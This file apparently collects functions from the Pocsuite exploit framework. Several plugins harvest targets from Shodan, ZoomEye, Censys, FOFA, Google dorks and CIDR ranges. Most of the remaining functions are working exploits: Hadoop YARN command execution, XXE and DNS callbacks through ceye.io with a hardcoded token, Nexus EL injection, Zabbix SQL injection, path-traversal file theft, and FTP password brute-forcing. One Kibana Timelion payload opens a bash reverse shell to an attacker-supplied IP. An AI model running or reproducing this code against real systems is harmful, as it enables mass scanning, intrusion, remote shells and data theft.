def init(self):
info_msg = "[PLUGIN] try fetch targets from CIDR..."
logger.info(info_msg)
cidr_set = set()
if "CIDR" in os.environ:
cidr_set.add(os.environ.get("CIDR"))
elif conf.url:
for i in conf.url:
cidr_set.add(i)
conf.url = []
else:
cidr_text = input("Please input CIDR address:")
cidr_set.add(cidr_text)
count = 0
for i in cidr_set:
try:
network = ip_network(i, strict=False)
for host in network.hosts():
self.add_target(host.exploded)
count += 1
except ValueError:
logger.error("[PLUGIN] error format from " + i)
info_msg = "[PLUGIN] get {0} target(s) from CIDR".format(count)
logger.info(info_msg)
def init(self):
self.init_zoomeye_api()
dork = None
if conf.dork_zoomeye:
dork = conf.dork_zoomeye
else:
dork = conf.dork
if not dork:
msg = "Need to set up dork (please --dork or --dork-zoomeye)"
raise PocsuitePluginDorkException(msg)
info_msg = "[PLUGIN] try fetch targets from zoomeye with dork: {0}".format(
dork)
logger.info(info_msg)
targets = self.zoomeye.search(dork,
conf.max_page,
resource=conf.search_type)
count = 0
if targets:
for target in targets:
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from zoomeye".format(count)
logger.info(info_msg)
def _verify(self):
result = {}
payload = random_str(16) + '.6eb4yw.ceye.io'
cmd = 'ping ' + payload
try:
if self.url[-1] == '/':
url1 = self.url + 'ws/v1/cluster/apps/new-application'
url2 = self.url + 'ws/v1/cluster/apps'
else:
url1 = self.url + '/' + 'ws/v1/cluster/apps/new-application'
url2 = self.url + '/' + 'ws/v1/cluster/apps'
resp = requests.post(url=url1)
app_id = resp.json()['application-id']
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '%s' % cmd,
},
},
'application-type': 'YARN',
}
attack = requests.post(
url=url2,
json=data
)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if payload in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def init(self):
self.init_fofa_crawler()
dork = None
if conf.dork_fofac:
dork = conf.dork_fofac
else:
dork = conf.dork
if not dork:
msg = "Need to set up dork (please --dork or --dork-fofac)"
raise PocsuitePluginDorkException(msg)
if kb.comparison:
kb.comparison.add_dork("Fofac", dork)
info_msg = "[PLUGIN] try fetch targets from fofa with dork: {0}".format(
dork)
logger.info(info_msg)
targets = self.fofac.search(dork)
count = 0
if targets:
for target in targets:
if kb.comparison:
kb.comparison.add_ip(target, "Fofa")
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from FOfac".format(count)
logger.info(info_msg)
def _attack(self):
result = {}
try:
Flag_error = "This file does not exist in JobManager log dir"
if self.get_option("filename"):
attack_filename = self.get_option("filename").replace(
'/', '\\\\')
else:
attack_filename = 'App\\Common\\Conf\\db.php'
logger.info("下载文件为:" + attack_filename)
attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
attack_url = self.url + attack_payload
logger.info(attack_url)
cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
attack_res = requests.get(attack_url,
cookies=cookies,
verify=False)
if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode(
):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = attack_url
result['VerifyInfo']['Payload'] = attack_payload
result['VerifyInfo'][
'File_Content'] = '\n' + attack_res.content.decode()
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
CEye_main = CEye(token=self.token)
ceye_subdomain = CEye_main.getsubdomain()
random_uri = random_str(16)
logger.info("random_url为:%s" % random_uri)
verify_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% xxe SYSTEM "http://%s/%s">
%%xxe;
]>""" % (ceye_subdomain,random_uri)
logger.warn(verify_payload)
veri_url = self.url
logger.warn(veri_url)
headers = {
"Content-Type": "text/xml",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"SOAPAction": "aaa"
}
try:
resp = requests.post(veri_url,data=verify_payload,headers=headers)
if CEye_main.verify_request(random_uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def init(self):
debug_msg = "[PLUGIN] file_record plugin init..."
logger.debug(debug_msg)
logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
if os.path.exists(self.filename):
raise Exception("The {} has existed".format(self.filename))
self.file = open(self.filename, 'a+')
def init(self):
self.init_shodan_api()
dork = None
if conf.dork_shodan:
dork = conf.dork_shodan
else:
dork = conf.dork
if not dork:
msg = "Need to set up dork (please --dork or --dork-shodan)"
raise PocsuitePluginDorkException(msg)
if conf.dork_b64:
import base64
dork = str(base64.b64decode(dork), encoding="utf-8")
if kb.comparison:
kb.comparison.add_dork("Shodan", dork)
info_msg = "[PLUGIN] try fetch targets from shodan with dork: {0}".format(dork)
logger.info(info_msg)
targets = self.shodan.search(dork, conf.max_page, resource=conf.search_type)
count = 0
if targets:
for target in targets:
if kb.comparison:
kb.comparison.add_ip(target, "Shodan")
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from shodan".format(count)
logger.info(info_msg)
def init(self):
self.init_censys_api()
dork = None
if conf.dork_censys:
dork = conf.dork_censys
else:
dork = conf.dork
if not dork:
msg = "Need to set up dork (please --dork or --dork-censys)"
raise PocsuitePluginDorkException(msg)
if conf.dork_b64:
import base64
dork = str(base64.b64decode(dork),encoding = "utf-8")
if kb.comparison:
kb.comparison.add_dork("Censys", dork)
info_msg = "[PLUGIN] try fetch targets from censys with dork: {0}".format(dork)
logger.info(info_msg)
search_type = conf.search_type
if search_type == "web":
search_type = "websites"
else:
search_type = "ipv4"
targets = self.censys.search(dork, conf.max_page, resource=search_type)
count = 0
if targets:
for target in targets:
if kb.comparison:
kb.comparison.add_ip(target, "Censys")
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from Censys".format(count)
logger.info(info_msg)
def init(self):
self.google = Google()
dork = None
if conf.dork_google:
dork = conf.dork_google
else:
dork = conf.dork
if not dork:
msg = "Need to set up dork (please --dork or --dork-google)"
raise PocsuitePluginDorkException(msg)
if kb.comparison:
kb.comparison.add_dork("Google", dork)
info_msg = "[PLUGIN] try fetch targets from google with dork: {0}".format(
dork)
logger.info(info_msg)
targets = self.google.search(dork)
count = 0
tmp = []
if targets:
for target in targets:
url = urlparse(target)
if url.scheme + "://" + url.netloc != 'https://www.google.com':
tmp.append(url.scheme + "://" + url.netloc)
targets = list(set(tmp))
for target in targets:
if kb.comparison:
kb.comparison.add_ip(target, "Google")
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from google".format(count)
logger.info(info_msg)
def task_thread():
while not task_queue.empty():
host, port, username, password = task_queue.get()
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, username, password))
if ftp_login(host, port, username, password):
with task_queue.mutex:
task_queue.queue.clear()
result_queue.put((username, password))
def test_EL(self, p_resp):
d = p_resp.json()
result = d[0]['message']
logger.info(result)
try:
if str(self.ran_sum) in result:
return True
except Exception:
return False
def test_EL(self, p_resp):
d = p_resp.json()
result = d['result']['errors']['roles']
logger.info(result)
try:
if str(self.ran_sum) in result:
return True
except Exception:
return False
def _verify(self):
result={}
vul_url = self.url
target_url = vul_url + "/service/extdirect"
j = {
"action":"coreui_User",
"method":"create",
"data": [
{
"userId": "shadowsock5",
"firstName": "77",
"lastName": "ss",
"password": "******",
"email": "*****@*****.**",
"status": "active",
"roles": [
"$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
]
}
],
"type":"rpc","tid":4}
resp = None # 返回的响应
l_auth_headers = self.get_auth_headers()
for auth_header in l_auth_headers:
# 将auth请求头更新到headers中
self.headers.update(auth_header)
# 更新CSRF token
self.headers.update(self.h)
try:
# 发起payload请求
resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})
if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except json.decoder.JSONDecodeError as e:
if resp.status_code == 401:
pass
#print("认证失败")
else:
logger.info("json解析失败")
# 失败了可能只是密码错误,继续下一个密码尝试
continue
except Exception as e:
logger.error(e)
raise e
def init_zoomeye_api(self):
self.zoomeye = ZoomEye(username=conf.login_user,
password=conf.login_pass)
if self.zoomeye.get_resource_info():
info_msg = "[PLUGIN] ZoomEeye search limit {0}".format(
self.zoomeye.resources)
logger.info(info_msg)
else:
info_msg = "[PLUGIN] ZoomEye login faild"
logger.error(info_msg)
def _verify(self):
# 验证代码
result = {}
output = Output(self)
kibana_path = self.url + "/app/kibana"
path1 = self.url + "/app/timelion"
print(path1)
path2 = self.url + "/api/timelion/run"
payload = {
"sheet": [
".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"bash -i >& "
"/dev/tcp/" + self.get_option("ncip") + "/" +
self.get_option("ncport") +
" 0>&1\");process.exit()//')\n.props("
"label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"
],
"time": {
"from": "now-15m",
"to": "now",
"mode": "quick",
"interval": "auto",
"timezone": "Asia/Shanghai"
}
}
resp = requests.get(kibana_path, verify=False, timeout=20)
kbn_version = ''
try:
kbn_version = resp.headers['kbn-version']
except Exception as e:
logger.info(e)
header = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
'Accept': 'application/json, text/plain, */*',
"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
'Connection': 'close',
'kbn-version': kbn_version,
'Content-Type': 'application/json;charset=UTF-8'
}
respose2 = requests.post(path2,
headers=header,
data=json.dumps(payload),
verify=False,
timeout=30)
# print(respose2.status_code)
if respose2.status_code == 200 and 'invokeTime' in respose2.text: # result是返回结果
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Referer'] = ""
return self.parse_output(result)
def _verify(self):
result = {}
try:
ip = self.url.split('//')[1]
port = int(self.get_option('port')) or 1099
if self.check(ip, port):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = ip
result['VerifyInfo']['Info'] = 'the target exist vulnerability'
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _verify(self):
result={}
vul_url = self.url
target_url = vul_url + "/service/rest/beta/repositories/go/group"
j = {
"name": "internal",
"online": "true",
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": "true"
},
"group": {
"memberNames": [
"$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
]
}
}
resp = None # 返回的响应
l_auth_headers = self.get_auth_headers()
for auth_header in l_auth_headers:
# 将auth请求头更新到headers中
self.headers.update(auth_header)
# 更新CSRF token
self.headers.update(self.h)
try:
# 发起payload请求
resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})
if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['Credentials'] = auth_header
return self.save_output(result)
return self.save_output(result)
except json.decoder.JSONDecodeError as e:
if resp.status_code == 401:
pass
#print("认证失败")
else:
logger.info("json解析失败")
# 失败了可能只是密码错误,继续下一个密码尝试
continue
except Exception as e:
logger.error(e)
raise e
def _verify(self):
result = {}
try:
host = self.url.split('//')[1]
port = 443
if self.check_heardbeat(host=host.encode(), port=port):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = host
result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _verify(self):
result = {}
try:
url = self.url + "/info"
res = requests.get(url)
if res.status_code == 200 and res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = url
except Exception as e:
logger.info(e)
return self.parse_ouput(result)
def init(self):
_pocs = []
for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH):
files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files)
_pocs.extend(map(lambda x: os.path.join(root, x), files))
for f in _pocs:
if self.add_poc_from_file(f):
info_msg = "[PLUGIN] load PoC script '{0}' from seebug success".format(f)
else:
info_msg = "[PLUGIN] load PoC script '{0}' from seebug failed".format(f)
logger.info(info_msg)
def _verify(self):
result = {}
payload = 'latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1'
try:
url = self._get_url + payload
response = requests.get(url)
if 'web.latest.toggle' in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _verify(self):
result = {}
payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31'
try:
target = self._get_url + payload
response = requests.get(url=target, headers=self._headers)
if 'Dashboard' in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _verify(self):
result = {}
vul_url = self.url
host, port = url2ip(vul_url, True)
logger.info("检查端口开放情况...")
# 端口都不开放就不浪费时间了
if not self.is_port_open(host, port):
logger.info("端口不开放! 退出!")
return
logger.info("端口开放... 继续")
target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format(
vul_url)
try:
resp = req.get(target_url, verify=False)
except Exception as e:
print(e)
raise e
if resp.status_code == 405:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
logger.info(resp)
return self.save_output(result)
def _attack(self):
result = {}
payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
vul_url = self.url + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
logger.info("url: {}".format(vul_url))
r = requests.get(vul_url, headers=headers)
if r.status_code == 200:
result['ShellInfo'] = {}
result['ShellInfo']['Content'] = r.text
return self.parse_output(result)
def ftp_burst(host, port):
if not port_check(host, port):
return
if anonymous_login(host, port):
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, 'anonymous', '<empty>'))
result_queue.put(('anonymous', '<empty>'))
return
try:
task_init(host, port)
run_threads(4, task_thread)
except Exception:
pass
def _verify(self):
result = {}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
}
log_path_list = {
'3': ['/Runtime/Logs/', '/App/Runtime/Logs/', '/Application/Runtime/Logs/Admin/',
'/Application/Runtime/Logs/Home/', '/Application/Runtime/Logs/'],
'5': ['/runtime/log/'],
}
for temppath in log_path_list['3']:
filename_list=self.getTPLogFilename(3)
for filename in filename_list:
logpath=temppath+filename
vulurl = "{}{}".format(
self.url.rstrip('/'), logpath)
logger.info("Scan {}".format(vulurl))
try:
resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False)
if "INFO" in resp.text and resp.status_code==200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
return self.parse_attack(result)
except Exception as e:
logger.error("connect target '{} failed!'".format(vulurl))
pass
for temppath in log_path_list['5']:
filename_list=self.getTPLogFilename(5)
for filename in filename_list:
logpath=temppath+filename
vulurl = "{}{}".format(
self.url.rstrip('/'), logpath)
logger.info("Scan {}".format(vulurl))
try:
resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False)
if "INFO" in resp.text and resp.status_code==200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
return self.parse_attack(result)
except Exception as e:
logger.error("connect target '{} failed!'".format(vulurl))
pass
return self.parse_attack(result)
def _sql_inject(self, sql):
payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + parse.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
if self.url[-1] == '/':
url = self.url + payload
else:
url = self.url + '/' + payload
try:
reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
response = requests.get(url, timeout=10)
result = reg.findall(response.text)
if result:
return result[0]
except Exception as e:
logger.info(e)
return False
def _verify(self):
result = {}
payload = 'ws_utc/resources/setting/options/general'
try:
if self.url[-1] == '/':
url = self.url + payload
else:
url = self.url + '/' + payload
response = requests.get(url=url, headers=self._headers)
if response.status_code != 404:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def init(self):
r = self.get_redis()
if r:
key = 'pocsuite_target'
info_msg = "[PLUGIN] try fetch targets from redis..."
logger.info(info_msg)
targets = r.get(key)
count = 0
if targets:
for target in targets:
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from redis".format(count)
logger.info(info_msg)
